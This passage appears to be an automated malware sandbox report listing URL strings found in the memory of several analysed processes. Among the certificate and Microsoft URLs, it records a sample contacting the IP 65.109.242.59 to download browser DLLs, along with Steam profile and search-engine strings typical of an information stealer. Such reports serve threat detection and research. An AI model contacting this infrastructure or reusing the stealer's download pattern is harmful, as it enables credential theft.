Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 9EDA.exe, 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000000.2358201708.00000000004B4000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: explorer.exe, 00000001.00000000.1694112047.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1693681888.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1695682915.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1697094973.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.co
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: kat796E.tmp, kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832497787.000000001B96D000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://65.109.242.59
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/
Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/#X
Source: kat796E.tmp, 00000009.00000003.2548139998.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/A
Source: kat796E.tmp, 00000009.00000003.2561043471.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549323476.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.0000000000933000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2550138162.0000000000932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/B
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/D
Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/GX
Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/NX
Source: kat796E.tmp, 00000009.00000003.2569509990.0000000000932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/T
Source: kat796E.tmp, 00000009.00000003.2548139998.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/U
Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/dX
Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2561219190.00000000008A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/f
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dll
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dll$
Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dllment
Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dllze
Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dll~
Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/kX
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/mozglue.dll
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/msvcp140.dll
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/nss3.dll
Source: kat796E.tmp, 00000009.00000003.2569509990.0000000000932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/sB
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/softokn3.dll
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/softokn3.dllt
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000052E000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.0000000000899000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.0000000000899000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/sqls.dll
Source: kat796E.tmp, 00000009.00000003.2561043471.0000000000932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/sx
Source: kat796E.tmp, 00000009.00000003.2561043471.0000000000932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/t
Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2561219190.00000000008A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/v
Source: kat796E.tmp, 00000009.00000002.2826699308.00000000008BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dll
Source: kat796E.tmp, 00000009.00000002.2826699308.00000000008BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dll/
Source: kat796E.tmp, 00000009.00000003.2549323476.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/x
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59BGCB
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59CAKE
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59FBKJ
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1697094973.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692031971.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1694837986.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000001.00000000.1694837986.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.clo
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
